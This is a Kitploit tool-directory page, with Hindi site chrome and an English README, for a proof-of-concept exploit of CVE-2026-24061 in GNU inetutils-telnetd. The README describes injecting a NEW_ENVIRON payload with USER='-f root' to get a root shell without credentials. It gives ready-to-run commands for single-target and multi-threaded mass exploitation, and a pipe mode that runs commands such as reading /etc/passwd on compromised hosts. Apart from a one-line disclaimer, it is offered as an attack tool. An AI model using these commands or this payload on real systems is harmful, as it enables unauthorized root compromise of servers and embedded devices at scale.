Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24061-PoC-Exploit — Remote authentication bypass exploit for GNU inetutils-telnetd (CVE-2026-24061) using CRLF injection to gain instant root shell. Supports single/mass exploitation, multi-threading, custom ports, pipe mode, and session keep-alive. | Kitploit
उपकरण/GitHubGitHub/tc4dy/cve-2026-24061-poc-exploit
Vulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access ToolPayload Development
GitHubtc4dy/cve-2026-24061-poc-exploit

CVE-2026-24061-PoC-Exploit

Remote authentication bypass exploit for GNU inetutils-telnetd (CVE-2026-24061) using CRLF injection to gain instant root shell. Supports single/mass exploitation, multi-threading, custom ports, pipe mode, and session keep-alive.

रिपॉजिटरी देखें
6152 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
अनुरोधित भाषा में सामग्री उपलब्ध नहीं है। अंग्रेज़ी संस्करण दिखाया जा रहा है।

CVE-2026-24061

CVE-2026-24061 - GNU inetutils-telnetd Authentication Bypass Exploit

Python Bash License CVSS

GNU inetutils-telnetd Edition - CRLF Injection to Authentication Bypass & Instant Root Shell

-Overview

This exploit leverages CVE-2026-24061, a critical remote authentication bypass vulnerability in GNU inetutils-telnetd. By injecting a crafted NEW_ENVIRON payload with USER='-f root', it bypasses authentication and grants an instant root shell without any credentials.

Note: The basic_exploit.sh script is a simplified, faster version of exploit.sh; however, exploit.sh is recommended for full functionality.

[>] Key Features

CategoryFeatures
Exploitation✅ Authentication Bypass via CRLF Injection
✅ Instant Root Shell
✅ Custom User Injection (-f admin, -f user)
Scanning✅ Single Target Exploitation
✅ Mass Exploitation from File
✅ Multi-Threading (configurable threads)
✅ Custom Port Support
Advanced✅ Pipe Mode (command execution via stdin)
✅ Session Keep-Alive
✅ Retry Mechanism
✅ Timeout Control
Usability✅ Colored Output (colorama)
✅ Dual Language (Python & Bash)
✅ Verbose/Debug Mode

[V] Vulnerable Versions

ProductVersions
GNU inetutils-telnetd1.9.3 - 2.7
Affected Linux DistributionsDebian, CentOS, Ubuntu and their distributions. (Zorin OS, Linux Mint, Pop!_OS and Elementary OS)
Embedded DevicesNAS, IoT, Routers

[!] Disclaimer: This tool is for authorized security testing and educational purposes only. Unauthorized access is illegal.

Installation

# python vers better btw

# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit

# Python version
pip3 install -r requirements.txt

# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh

[i] Usage Examples

Single Target Exploitation

# Python version
python3 exploit.py -u 192.168.1.100

# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100

Custom Port and User

# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323

# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin

Mass Exploitation (Multi-Target)

# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20

# Bash version
./exploit.sh -l targets.txt -m 20

Pipe Mode (Command Execution)

# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100

# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100

Advanced Options

# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v

# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5

# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive

[-<] Command Line Arguments

ShortLongDescriptionDefault
-u--urlTarget IP addressRequired
-p--portTarget port23
-l--listFile containing target listNone
-m--max-threadsMaximum threads for mass exploitation10
-usr--usernameUsername to injectroot
-t--timeoutSocket timeout (seconds)10
-r--retriesNumber of retry attempts3
-v--verboseEnable debug outputFalse
--keep-aliveKeep session alive after exploitationFalse

Related Exploits

Check out my other exploit repositories:

  • CVE-2026-41940
  • CVE-2026-0073
  • CVE-2026-29000
टूल डाउनलोड करें